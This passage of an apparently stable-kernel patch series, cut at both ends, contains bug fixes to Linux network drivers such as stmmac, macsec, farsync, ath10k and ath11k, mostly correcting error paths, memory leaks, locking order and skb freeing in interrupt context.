+ 		data = (data * 1000) / 465;
+ 
+-	data &= PTP_SSIR_SSINC_MASK;
++	if (data > PTP_SSIR_SSINC_MAX)
++		data = PTP_SSIR_SSINC_MAX;
+ 
+ 	reg_value = data;
+ 	if (gmac4)
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 23ec0a9e396c6..feb209d4b991e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -7097,7 +7097,8 @@ int stmmac_dvr_probe(struct device *device,
+ 	priv->wq = create_singlethread_workqueue("stmmac_wq");
+ 	if (!priv->wq) {
+ 		dev_err(priv->device, "failed to create workqueue\n");
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto error_wq_init;
+ 	}
+ 
+ 	INIT_WORK(&priv->service_task, stmmac_service_task);
+@@ -7325,6 +7326,7 @@ error_mdio_register:
+ 	stmmac_napi_del(ndev);
+ error_hw_init:
+ 	destroy_workqueue(priv->wq);
++error_wq_init:
+ 	bitmap_free(priv->af_xdp_zc_qps);
+ 
+ 	return ret;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.h b/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.h
+index 53172a4398101..bf619295d079f 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.h
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.h
+@@ -64,7 +64,7 @@
+ #define	PTP_TCR_TSENMACADDR	BIT(18)
+ 
+ /* SSIR defines */
+-#define	PTP_SSIR_SSINC_MASK		0xff
++#define	PTP_SSIR_SSINC_MAX		0xff
+ #define	GMAC4_PTP_SSIR_SSINC_SHIFT	16
+ 
+ /* Auxiliary Control defines */
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_selftests.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_selftests.c
+index 49af7e78b7f59..687f43cd466c6 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_selftests.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_selftests.c
+@@ -1654,12 +1654,16 @@ static int stmmac_test_arpoffload(struct stmmac_priv *priv)
+ 	}
+ 
+ 	ret = stmmac_set_arp_offload(priv, priv->hw, true, ip_addr);
+-	if (ret)
++	if (ret) {
++		kfree_skb(skb);
+ 		goto cleanup;
++	}
+ 
+ 	ret = dev_set_promiscuity(priv->dev, 1);
+-	if (ret)
++	if (ret) {
++		kfree_skb(skb);
+ 		goto cleanup;
++	}
+ 
+ 	ret = dev_direct_xmit(skb, 0);
+ 	if (ret)
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index b3b0ba842541d..4ff1cfdb9730c 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -564,13 +564,13 @@ static int am65_cpsw_nuss_ndo_slave_open(struct net_device *ndev)
+ 	ret = netif_set_real_num_tx_queues(ndev, common->tx_ch_num);
+ 	if (ret) {
+ 		dev_err(common->dev, "cannot set real number of tx queues\n");
+-		return ret;
++		goto runtime_put;
+ 	}
+ 
+ 	ret = netif_set_real_num_rx_queues(ndev, AM65_CPSW_MAX_RX_QUEUES);
+ 	if (ret) {
+ 		dev_err(common->dev, "cannot set real number of rx queues\n");
+-		return ret;
++		goto runtime_put;
+ 	}
+ 
+ 	for (i = 0; i < common->tx_ch_num; i++)
+@@ -578,7 +578,7 @@ static int am65_cpsw_nuss_ndo_slave_open(struct net_device *ndev)
+ 
+ 	ret = am65_cpsw_nuss_common_open(common);
+ 	if (ret)
+-		return ret;
++		goto runtime_put;
+ 
+ 	common->usage_count++;
+ 
+@@ -606,6 +606,10 @@ static int am65_cpsw_nuss_ndo_slave_open(struct net_device *ndev)
+ error_cleanup:
+ 	am65_cpsw_nuss_ndo_slave_stop(ndev);
+ 	return ret;
++
++runtime_put:
++	pm_runtime_put(common->dev);
++	return ret;
+ }
+ 
+ static void am65_cpsw_nuss_rx_cleanup(void *data, dma_addr_t desc_dma)
+diff --git a/drivers/net/ethernet/ti/netcp_core.c b/drivers/net/ethernet/ti/netcp_core.c
+index aba70bef48945..9eb9eaff4dc90 100644
+--- a/drivers/net/ethernet/ti/netcp_core.c
++++ b/drivers/net/ethernet/ti/netcp_core.c
+@@ -1261,7 +1261,7 @@ out:
+ }
+ 
+ /* Submit the packet */
+-static int netcp_ndo_start_xmit(struct sk_buff *skb, struct net_device *ndev)
++static netdev_tx_t netcp_ndo_start_xmit(struct sk_buff *skb, struct net_device *ndev)
+ {
+ 	struct netcp_intf *netcp = netdev_priv(ndev);
+ 	struct netcp_stats *tx_stats = &netcp->stats;
+diff --git a/drivers/net/ethernet/xilinx/xilinx_emaclite.c b/drivers/net/ethernet/xilinx/xilinx_emaclite.c
+index a3967f8de417d..ad2c30d9a4824 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_emaclite.c
++++ b/drivers/net/ethernet/xilinx/xilinx_emaclite.c
+@@ -536,7 +536,7 @@ static void xemaclite_tx_timeout(struct net_device *dev, unsigned int txqueue)
+ 	xemaclite_enable_interrupts(lp);
+ 
+ 	if (lp->deferred_skb) {
+-		dev_kfree_skb(lp->deferred_skb);
++		dev_kfree_skb_irq(lp->deferred_skb);
+ 		lp->deferred_skb = NULL;
+ 		dev->stats.tx_errors++;
+ 	}
+diff --git a/drivers/net/fddi/defxx.c b/drivers/net/fddi/defxx.c
+index b584ffe38ad68..1fef8a9b1a0fd 100644
+--- a/drivers/net/fddi/defxx.c
++++ b/drivers/net/fddi/defxx.c
+@@ -3831,10 +3831,24 @@ static int dfx_init(void)
+ 	int status;
+ 
+ 	status = pci_register_driver(&dfx_pci_driver);
+-	if (!status)
+-		status = eisa_driver_register(&dfx_eisa_driver);
+-	if (!status)
+-		status = tc_register_driver(&dfx_tc_driver);
++	if (status)
++		goto err_pci_register;
++
++	status = eisa_driver_register(&dfx_eisa_driver);
++	if (status)
++		goto err_eisa_register;
++
++	status = tc_register_driver(&dfx_tc_driver);
++	if (status)
++		goto err_tc_register;
++
++	return 0;
++
++err_tc_register:
++	eisa_driver_unregister(&dfx_eisa_driver);
++err_eisa_register:
++	pci_unregister_driver(&dfx_pci_driver);
++err_pci_register:
+ 	return status;
+ }
+ 
+diff --git a/drivers/net/hamradio/baycom_epp.c b/drivers/net/hamradio/baycom_epp.c
+index 791b4a53d69fd..bd3b0c2655a28 100644
+--- a/drivers/net/hamradio/baycom_epp.c
++++ b/drivers/net/hamradio/baycom_epp.c
+@@ -758,7 +758,7 @@ static void epp_bh(struct work_struct *work)
+  * ===================== network driver interface =========================
+  */
+ 
+-static int baycom_send_packet(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t baycom_send_packet(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct baycom_state *bc = netdev_priv(dev);
+ 
+diff --git a/drivers/net/hamradio/scc.c b/drivers/net/hamradio/scc.c
+index f90830d3dfa69..a9184a78650b0 100644
+--- a/drivers/net/hamradio/scc.c
++++ b/drivers/net/hamradio/scc.c
+@@ -302,12 +302,12 @@ static inline void scc_discard_buffers(struct scc_channel *scc)
+ 	spin_lock_irqsave(&scc->lock, flags);	
+ 	if (scc->tx_buff != NULL)
+ 	{
+-		dev_kfree_skb(scc->tx_buff);
++		dev_kfree_skb_irq(scc->tx_buff);
+ 		scc->tx_buff = NULL;
+ 	}
+ 	
+ 	while (!skb_queue_empty(&scc->tx_queue))
+-		dev_kfree_skb(skb_dequeue(&scc->tx_queue));
++		dev_kfree_skb_irq(skb_dequeue(&scc->tx_queue));
+ 
+ 	spin_unlock_irqrestore(&scc->lock, flags);
+ }
+@@ -1668,7 +1668,7 @@ static netdev_tx_t scc_net_tx(struct sk_buff *skb, struct net_device *dev)
+ 	if (skb_queue_len(&scc->tx_queue) > scc->dev->tx_queue_len) {
+ 		struct sk_buff *skb_del;
+ 		skb_del = skb_dequeue(&scc->tx_queue);
+-		dev_kfree_skb(skb_del);
++		dev_kfree_skb_irq(skb_del);
+ 	}
+ 	skb_queue_tail(&scc->tx_queue, skb);
+ 	netif_trans_update(dev);
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 2fbac51b9b19e..038a787943927 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -2593,7 +2593,7 @@ static int macsec_upd_offload(struct sk_buff *skb, struct genl_info *info)
+ 	const struct macsec_ops *ops;
+ 	struct macsec_context ctx;
+ 	struct macsec_dev *macsec;
+-	int ret;
++	int ret = 0;
+ 
+ 	if (!attrs[MACSEC_ATTR_IFINDEX])
+ 		return -EINVAL;
+@@ -2606,28 +2606,36 @@ static int macsec_upd_offload(struct sk_buff *skb, struct genl_info *info)
+ 					macsec_genl_offload_policy, NULL))
+ 		return -EINVAL;
+ 
++	rtnl_lock();
++
+ 	dev = get_dev_from_nl(genl_info_net(info), attrs);
+-	if (IS_ERR(dev))
+-		return PTR_ERR(dev);
++	if (IS_ERR(dev)) {
++		ret = PTR_ERR(dev);
++		goto out;
++	}
+ 	macsec = macsec_priv(dev);
+ 
+-	if (!tb_offload[MACSEC_OFFLOAD_ATTR_TYPE])
+-		return -EINVAL;
++	if (!tb_offload[MACSEC_OFFLOAD_ATTR_TYPE]) {
++		ret = -EINVAL;
++		goto out;
++	}
+ 
+ 	offload = nla_get_u8(tb_offload[MACSEC_OFFLOAD_ATTR_TYPE]);
+ 	if (macsec->offload == offload)
+-		return 0;
++		goto out;
+ 
+ 	/* Check if the offloading mode is supported by the underlying layers */
+ 	if (offload != MACSEC_OFFLOAD_OFF &&
+-	    !macsec_check_offload(offload, macsec))
+-		return -EOPNOTSUPP;
++	    !macsec_check_offload(offload, macsec)) {
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
+ 
+ 	/* Check if the net device is busy. */
+-	if (netif_running(dev))
+-		return -EBUSY;
+-
+-	rtnl_lock();
++	if (netif_running(dev)) {
++		ret = -EBUSY;
++		goto out;
++	}
+ 
+ 	prev_offload = macsec->offload;
+ 	macsec->offload = offload;
+@@ -2662,7 +2670,7 @@ static int macsec_upd_offload(struct sk_buff *skb, struct genl_info *info)
+ 
+ rollback:
+ 	macsec->offload = prev_offload;
+-
++out:
+ 	rtnl_unlock();
+ 	return ret;
+ }
+diff --git a/drivers/net/mctp/mctp-serial.c b/drivers/net/mctp/mctp-serial.c
+index 7cd103fd34ef7..9f9eaf896047c 100644
+--- a/drivers/net/mctp/mctp-serial.c
++++ b/drivers/net/mctp/mctp-serial.c
+@@ -35,6 +35,8 @@
+ #define BYTE_FRAME		0x7e
+ #define BYTE_ESC		0x7d
+ 
++#define FCS_INIT		0xffff
++
+ static DEFINE_IDA(mctp_serial_ida);
+ 
+ enum mctp_serial_state {
+@@ -123,7 +125,7 @@ static void mctp_serial_tx_work(struct work_struct *work)
+ 		buf[2] = dev->txlen;
+ 
+ 		if (!dev->txpos)
+-			dev->txfcs = crc_ccitt(0, buf + 1, 2);
++			dev->txfcs = crc_ccitt(FCS_INIT, buf + 1, 2);
+ 
+ 		txlen = write_chunk(dev, buf + dev->txpos, 3 - dev->txpos);
+ 		if (txlen <= 0) {
+@@ -303,7 +305,7 @@ static void mctp_serial_push_header(struct mctp_serial *dev, unsigned char c)
+ 	case 1:
+ 		if (c == MCTP_SERIAL_VERSION) {
+ 			dev->rxpos++;
+-			dev->rxfcs = crc_ccitt_byte(0, c);
++			dev->rxfcs = crc_ccitt_byte(FCS_INIT, c);
+ 		} else {
+ 			dev->rxstate = STATE_ERR;
+ 		}
+diff --git a/drivers/net/ntb_netdev.c b/drivers/net/ntb_netdev.c
+index a4abea921046b..85dbe7f73e319 100644
+--- a/drivers/net/ntb_netdev.c
++++ b/drivers/net/ntb_netdev.c
+@@ -137,7 +137,7 @@ static void ntb_netdev_rx_handler(struct ntb_transport_qp *qp, void *qp_data,
+ enqueue_again:
+ 	rc = ntb_transport_rx_enqueue(qp, skb, skb->data, ndev->mtu + ETH_HLEN);
+ 	if (rc) {
+-		dev_kfree_skb(skb);
++		dev_kfree_skb_any(skb);
+ 		ndev->stats.rx_errors++;
+ 		ndev->stats.rx_fifo_errors++;
+ 	}
+@@ -192,7 +192,7 @@ static void ntb_netdev_tx_handler(struct ntb_transport_qp *qp, void *qp_data,
+ 		ndev->stats.tx_aborted_errors++;
+ 	}
+ 
+-	dev_kfree_skb(skb);
++	dev_kfree_skb_any(skb);
+ 
+ 	if (ntb_transport_tx_free_entry(dev->qp) >= tx_start) {
+ 		/* Make sure anybody stopping the queue after this sees the new
+diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
+index 9206c660a72ed..d4c821c8cf57c 100644
+--- a/drivers/net/ppp/ppp_generic.c
++++ b/drivers/net/ppp/ppp_generic.c
+@@ -1743,6 +1743,8 @@ ppp_send_frame(struct ppp *ppp, struct sk_buff *skb)
+ 	int len;
+ 	unsigned char *cp;
+ 
++	skb->dev = ppp->dev;
++
+ 	if (proto < 0x8000) {
+ #ifdef CONFIG_PPP_FILTER
+ 		/* check if we should pass this packet */
+diff --git a/drivers/net/wan/farsync.c b/drivers/net/wan/farsync.c
+index 6a212c085435b..5b01642ca44e0 100644
+--- a/drivers/net/wan/farsync.c
++++ b/drivers/net/wan/farsync.c
+@@ -2545,6 +2545,7 @@ fst_remove_one(struct pci_dev *pdev)
+ 		struct net_device *dev = port_to_dev(&card->ports[i]);
+ 
+ 		unregister_hdlc_device(dev);
++		free_netdev(dev);
+ 	}
+ 
+ 	fst_disable_intr(card);
+@@ -2564,6 +2565,7 @@ fst_remove_one(struct pci_dev *pdev)
+ 				  card->tx_dma_handle_card);
+ 	}
+ 	fst_card_array[card->card_no] = NULL;
++	kfree(card);
+ }
+ 
+ static struct pci_driver fst_driver = {
+diff --git a/drivers/net/wireless/ath/ar5523/ar5523.c b/drivers/net/wireless/ath/ar5523/ar5523.c
+index 6f937d2cc1263..ce3d613fa36c4 100644
+--- a/drivers/net/wireless/ath/ar5523/ar5523.c
++++ b/drivers/net/wireless/ath/ar5523/ar5523.c
+@@ -241,6 +241,11 @@ static void ar5523_cmd_tx_cb(struct urb *urb)
+ 	}
+ }
+ 
++static void ar5523_cancel_tx_cmd(struct ar5523 *ar)
++{
++	usb_kill_urb(ar->tx_cmd.urb_tx);
++}
++
+ static int ar5523_cmd(struct ar5523 *ar, u32 code, const void *idata,
+ 		      int ilen, void *odata, int olen, int flags)
+ {
+@@ -280,6 +285,7 @@ static int ar5523_cmd(struct ar5523 *ar, u32 code, const void *idata,
+ 	}
+ 
+ 	if (!wait_for_completion_timeout(&cmd->done, 2 * HZ)) {
++		ar5523_cancel_tx_cmd(ar);
+ 		cmd->odata = NULL;
+ 		ar5523_err(ar, "timeout waiting for command %02x reply\n",
+ 			   code);
+diff --git a/drivers/net/wireless/ath/ath10k/core.c b/drivers/net/wireless/ath/ath10k/core.c
+index 400f332a7ff01..5eb131ab916fd 100644
+--- a/drivers/net/wireless/ath/ath10k/core.c
++++ b/drivers/net/wireless/ath/ath10k/core.c
+@@ -99,6 +99,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA988X_HW_2_0_VERSION,
+@@ -138,6 +139,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9887_HW_1_0_VERSION,
+@@ -178,6 +180,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA6174_HW_3_2_VERSION,
+@@ -213,6 +216,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = true,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA6174_HW_2_1_VERSION,
+@@ -252,6 +256,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA6174_HW_2_1_VERSION,
+@@ -291,6 +296,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA6174_HW_3_0_VERSION,
+@@ -330,6 +336,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA6174_HW_3_2_VERSION,
+@@ -373,6 +380,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = true,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA99X0_HW_2_0_DEV_VERSION,
+@@ -418,6 +426,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9984_HW_1_0_DEV_VERSION,
+@@ -470,6 +479,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9888_HW_2_0_DEV_VERSION,
+@@ -519,6 +529,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9377_HW_1_0_DEV_VERSION,
+@@ -558,6 +569,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9377_HW_1_1_DEV_VERSION,
+@@ -599,6 +611,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9377_HW_1_1_DEV_VERSION,
+@@ -631,6 +644,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA4019_HW_1_0_DEV_VERSION,
+@@ -677,6 +691,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = WCN3990_HW_1_0_DEV_VERSION,
+@@ -709,6 +724,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = true,
+ 		.hw_restart_disconnect = true,
+ 		.use_fw_tx_credits = false,
++		.delay_unmap_buffer = true,
+ 	},
+ };
+ 
+diff --git a/drivers/net/wireless/ath/ath10k/htc.c b/drivers/net/wireless/ath/ath10k/htc.c
+index 6d1784f74bea4..5bfeecb95fca2 100644
+--- a/drivers/net/wireless/ath/ath10k/htc.c
++++ b/drivers/net/wireless/ath/ath10k/htc.c
+@@ -56,6 +56,15 @@ void ath10k_htc_notify_tx_completion(struct ath10k_htc_ep *ep,
+ 	ath10k_dbg(ar, ATH10K_DBG_HTC, "%s: ep %d skb %pK\n", __func__,
+ 		   ep->eid, skb);
+ 
++	/* A corner case where the copy completion is reaching to host but still
++	 * copy engine is processing it due to which host unmaps corresponding
++	 * memory and causes SMMU fault, hence as workaround adding delay
++	 * the unmapping memory to avoid SMMU faults.
++	 */
++	if (ar->hw_params.delay_unmap_buffer &&
++	    ep->ul_pipe_id == 3)
++		mdelay(2);
++
+ 	hdr = (struct ath10k_htc_hdr *)skb->data;
+ 	ath10k_htc_restore_tx_skb(ep->htc, skb);
+ 
+diff --git a/drivers/net/wireless/ath/ath10k/hw.h b/drivers/net/wireless/ath/ath10k/hw.h
+index 1b99f3a39a113..9643031a4427a 100644
+--- a/drivers/net/wireless/ath/ath10k/hw.h
++++ b/drivers/net/wireless/ath/ath10k/hw.h
+@@ -637,6 +637,8 @@ struct ath10k_hw_params {
+ 	bool hw_restart_disconnect;
+ 
+ 	bool use_fw_tx_credits;
++
++	bool delay_unmap_buffer;
+ };
+ 
+ struct htt_resp;
+diff --git a/drivers/net/wireless/ath/ath10k/pci.c b/drivers/net/wireless/ath/ath10k/pci.c
+index e56c6a6b13791..728d607289c36 100644
+--- a/drivers/net/wireless/ath/ath10k/pci.c
++++ b/drivers/net/wireless/ath/ath10k/pci.c
+@@ -3792,18 +3792,22 @@ static struct pci_driver ath10k_pci_driver = {
+ 
+ static int __init ath10k_pci_init(void)
+ {
+-	int ret;
++	int ret1, ret2;
+ 
+-	ret = pci_register_driver(&ath10k_pci_driver);
+-	if (ret)
++	ret1 = pci_register_driver(&ath10k_pci_driver);
++	if (ret1)
+ 		printk(KERN_ERR "failed to register ath10k pci driver: %d\n",
+-		       ret);
++		       ret1);
+ 
+-	ret = ath10k_ahb_init();
+-	if (ret)
+-		printk(KERN_ERR "ahb init failed: %d\n", ret);
++	ret2 = ath10k_ahb_init();
++	if (ret2)
++		printk(KERN_ERR "ahb init failed: %d\n", ret2);
+ 
+-	return ret;
++	if (ret1 && ret2)
++		return ret1;
++
++	/* registered to at least one bus */
++	return 0;
+ }
+ module_init(ath10k_pci_init);
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/core.h b/drivers/net/wireless/ath/ath11k/core.h
+index cf2f52cc4e30d..c20e84e031fad 100644
+--- a/drivers/net/wireless/ath/ath11k/core.h
++++ b/drivers/net/wireless/ath/ath11k/core.h
+@@ -505,6 +505,8 @@ struct ath11k_sta {
+ 	u64 ps_start_jiffies;
+ 	u64 ps_total_duration;
+ 	bool peer_current_ps_valid;
++
++	u32 bw_prev;
+ };
+ 
+ #define ATH11K_MIN_5G_FREQ 4150
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index 2d1e3fd9b526c..ef7617802491e 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -4215,10 +4215,11 @@ static void ath11k_sta_rc_update_wk(struct work_struct *wk)
+ 	const u8 *ht_mcs_mask;
+ 	const u16 *vht_mcs_mask;
+ 	const u16 *he_mcs_mask;
+-	u32 changed, bw, nss, smps;
++	u32 changed, bw, nss, smps, bw_prev;
+ 	int err, num_vht_rates, num_he_rates;
+ 	const struct cfg80211_bitrate_mask *mask;
+ 	struct peer_assoc_params peer_arg;
++	enum wmi_phy_mode peer_phymode;
+ 
+ 	arsta = container_of(wk, struct ath11k_sta, update_wk);
+ 	sta = container_of((void *)arsta, struct ieee80211_sta, drv_priv);
+@@ -4239,6 +4240,7 @@ static void ath11k_sta_rc_update_wk(struct work_struct *wk)
+ 	arsta->changed = 0;
+ 
+ 	bw = arsta->bw;
++	bw_prev = arsta->bw_prev;
+ 	nss = arsta->nss;
+ 	smps = arsta->smps;
+ 
+@@ -4252,26 +4254,57 @@ static void ath11k_sta_rc_update_wk(struct work_struct *wk)
+ 			   ath11k_mac_max_he_nss(he_mcs_mask)));
+ 
+ 	if (changed & IEEE80211_RC_BW_CHANGED) {
+-		/* Send peer assoc command before set peer bandwidth param to
+-		 * avoid the mismatch between the peer phymode and the peer
+-		 * bandwidth.
+-		 */
+-		ath11k_peer_assoc_prepare(ar, arvif->vif, sta, &peer_arg, true);
+-
+-		peer_arg.is_assoc = false;
+-		err = ath11k_wmi_send_peer_assoc_cmd(ar, &peer_arg);
+-		if (err) {
+-			ath11k_warn(ar->ab, "failed to send peer assoc for STA %pM vdev %i: %d\n",
+-				    sta->addr, arvif->vdev_id, err);
+-		} else if (wait_for_completion_timeout(&ar->peer_assoc_done, 1 * HZ)) {
++		/* Get the peer phymode */
++		ath11k_peer_assoc_h_phymode(ar, arvif->vif, sta, &peer_arg);
++		peer_phymode = peer_arg.peer_phymode;
++
++		ath11k_dbg(ar->ab, ATH11K_DBG_MAC, "mac update sta %pM peer bw %d phymode %d\n",
++			   sta->addr, bw, peer_phymode);
++
++		if (bw > bw_prev) {
++			/* BW is upgraded. In this case we send WMI_PEER_PHYMODE
++			 * followed by WMI_PEER_CHWIDTH
++			 */
++			ath11k_dbg(ar->ab, ATH11K_DBG_MAC, "mac BW upgrade for sta %pM new BW %d, old BW %d\n",
++				   sta->addr, bw, bw_prev);
++
++			err = ath11k_wmi_set_peer_param(ar, sta->addr, arvif->vdev_id,
++							WMI_PEER_PHYMODE, peer_phymode);
++
++			if (err) {
++				ath11k_warn(ar->ab, "failed to update STA %pM peer phymode %d: %d\n",
++					    sta->addr, peer_phymode, err);
++				goto err_rc_bw_changed;
++			}
++
+ 			err = ath11k_wmi_set_peer_param(ar, sta->addr, arvif->vdev_id,
+ 							WMI_PEER_CHWIDTH, bw);
++
+ 			if (err)
+ 				ath11k_warn(ar->ab, "failed to update STA %pM peer bw %d: %d\n",
+ 					    sta->addr, bw, err);
+ 		} else {
+-			ath11k_warn(ar->ab, "failed to get peer assoc conf event for %pM vdev %i\n",
+-				    sta->addr, arvif->vdev_id);
++			/* BW is downgraded. In this case we send WMI_PEER_CHWIDTH
++			 * followed by WMI_PEER_PHYMODE
++			 */
++			ath11k_dbg(ar->ab, ATH11K_DBG_MAC, "mac BW downgrade for sta %pM new BW %d,old BW %d\n",
++				   sta->addr, bw, bw_prev);
++
++			err = ath11k_wmi_set_peer_param(ar, sta->addr, arvif->vdev_id,
++							WMI_PEER_CHWIDTH, bw);
++
++			if (err) {
++				ath11k_warn(ar->ab, "failed to update STA %pM peer bw %d: %d\n",
++					    sta->addr, bw, err);
++				goto err_rc_bw_changed;
++			}
++
++			err = ath11k_wmi_set_peer_param(ar, sta->addr, arvif->vdev_id,
++							WMI_PEER_PHYMODE, peer_phymode);
++
++			if (err)
++				ath11k_warn(ar->ab, "failed to update STA %pM peer phymode %d: %d\n",
++					    sta->addr, peer_phymode, err);
+ 		}
+ 	}
+ 
+@@ -4352,6 +4385,7 @@ static void ath11k_sta_rc_update_wk(struct work_struct *wk)
+ 		}
+ 	}
+ 
++err_rc_bw_changed:
+ 	mutex_unlock(&ar->conf_mutex);
+ }
+ 
+@@ -4505,6 +4539,34 @@ exit:
+ 	return ret;
+ }
+ 
++static u32 ath11k_mac_ieee80211_sta_bw_to_wmi(struct ath11k *ar,
++					      struct ieee80211_sta *sta)
++{
++	u32 bw = WMI_PEER_CHWIDTH_20MHZ;
++
++	switch (sta->deflink.bandwidth) {
++	case IEEE80211_STA_RX_BW_20:
++		bw = WMI_PEER_CHWIDTH_20MHZ;
++		break;
++	case IEEE80211_STA_RX_BW_40:
++		bw = WMI_PEER_CHWIDTH_40MHZ;
++		break;
++	case IEEE80211_STA_RX_BW_80:
++		bw = WMI_PEER_CHWIDTH_80MHZ;
++		break;
++	case IEEE80211_STA_RX_BW_160:
++		bw = WMI_PEER_CHWIDTH_160MHZ;
++		break;
++	default:
++		ath11k_warn(ar->ab, "Invalid bandwidth %d for %pM\n",
++			    sta->deflink.bandwidth, sta->addr);
++		bw = WMI_PEER_CHWIDTH_20MHZ;
++		break;
++	}
++
++	return bw;
++}
++
+ static int ath11k_mac_op_sta_state(struct ieee80211_hw *hw,
+ 				   struct ieee80211_vif *vif,
+ 				   struct ieee80211_sta *sta,
+@@ -4590,6 +4652,12 @@ static int ath11k_mac_op_sta_state(struct ieee80211_hw *hw,
+ 		if (ret)
+ 			ath11k_warn(ar->ab, "Failed to associate station: %pM\n",
+ 				    sta->addr);
++
++		spin_lock_bh(&ar->data_lock);
++		/* Set arsta bw and prev bw */
++		arsta->bw = ath11k_mac_ieee80211_sta_bw_to_wmi(ar, sta);
++		arsta->bw_prev = arsta->bw;
++		spin_unlock_bh(&ar->data_lock);
+ 	} else if (old_state == IEEE80211_STA_ASSOC &&
+ 		   new_state == IEEE80211_STA_AUTHORIZED) {
+ 		spin_lock_bh(&ar->ab->base_lock);
+@@ -4713,28 +4781,8 @@ static void ath11k_mac_op_sta_rc_update(struct ieee80211_hw *hw,
+ 	spin_lock_bh(&ar->data_lock);
+ 
+ 	if (changed & IEEE80211_RC_BW_CHANGED) {
+-		bw = WMI_PEER_CHWIDTH_20MHZ;
+-
